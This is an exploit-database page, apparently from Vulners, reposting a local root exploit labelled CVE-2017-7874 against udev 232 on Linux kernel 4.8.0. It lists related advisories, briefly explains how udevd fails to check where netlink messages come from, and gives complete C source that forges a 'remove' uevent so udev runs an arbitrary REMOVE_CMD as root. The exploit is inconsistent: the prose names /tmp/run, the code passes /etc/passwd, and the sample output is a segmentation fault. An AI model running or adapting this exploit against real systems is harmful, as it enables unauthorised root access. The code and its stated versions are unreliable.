Vulners
Lucene search
Linux Kernel 4.8.0 udev 232 Privilege Escalation Exploit
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | CVE-2017-7874 | 15 Apr 201712:46 | – | circl |
 | Linux kernel local elevation of privilege vulnerability (CNVD-2017-05961) | 18 Apr 201700:00 | – | cnvd |
 | CVE-2017-7874 | 15 Apr 201716:00 | – | cve |
 | CVE-2017-7874 | 15 Apr 201716:00 | – | cvelist |
 | Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation | 15 Apr 201700:00 | – | exploitdb |
 | Linux Kernel 4.8.0 UDEV 232 - Local Privilege Escalation | 15 Apr 201700:00 | – | exploitpack |
 | CVE-2017-7874 | 15 Apr 201716:59 | – | nvd |
 | Linux Kernel 4.8.0 udev 232 Privilege Escalation | 15 Apr 201700:00 | – | packetstorm |
 | SUSE CVE-2017-7874 | 15 Feb 202304:46 | – | susecve |
# Title: Linux Kernel 4.8.0 udev 232 - Privilege Escalation
# Author: Nassim Asrir
# Researcher at: Henceforth
# Author contact: [email protected] || https://www.linkedin.com/in/nassim-asrir-b73a57122/
# The full Research: https://www.facebook.com/asrirnassim/
# CVE: CVE-2017-7874
# Exp #
first of all we need to know a small infos about udev and how it work
the udev deamon is responsible for receiving device events from the kernel
and this event are delivered to udev via netlink (is a socket family)
you can read more about udev from: https://en.wikipedia.org/wiki/Udev
# Exploit #
The udev vulnerability resulted from a lack of verification of the netlink message source in udevd.
read lines from: /lib/udev/rules.d/50-udev-default.rules
all we need is this action: ACTION=="remove", ENV{REMOVE_CMD}!="", RUN+="$env{REMOVE_CMD}"
this action allows execution of arbitrary commands.
in our exploit we specifying a malicious REMOVE_CMD and causes the privileged execution of attacker-controlled /tmp/run file.
Get your udev version:
Execute: $ udevadm --version
//output: 232
Maybe < 232 also is vulnerable
// gcc rootme.c -o rootme
// ./rootme
// segmantation fault
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>
#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
int
main(int argc, char **argv)
{
int sock;
char *mp;
char message[4096];
struct msghdr msg;
struct iovec iovector;
struct sockaddr_nl address;
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(sock, (struct sockaddr *) &address, sizeof(address));
mp = message;
mp += sprintf(mp, "[email protected]/d") + 1;
mp += sprintf(mp, "SUBSYSTEM=block") + 1;
mp += sprintf(mp, "DEVPATH=/dev/foo") + 1;
mp += sprintf(mp, "TIMEOUT=10") + 1;
mp += sprintf(mp, "ACTION=remove") +1;
mp += sprintf(mp, "REMOVE_CMD=/etc/passwd") +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
sendmsg(sock, &msg, 0);
close(sock);
return 0;
}
# 0day.today [2017-12-31] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Apr 2017 00:00Current
0.2Low risk
Vulners AI Score0.2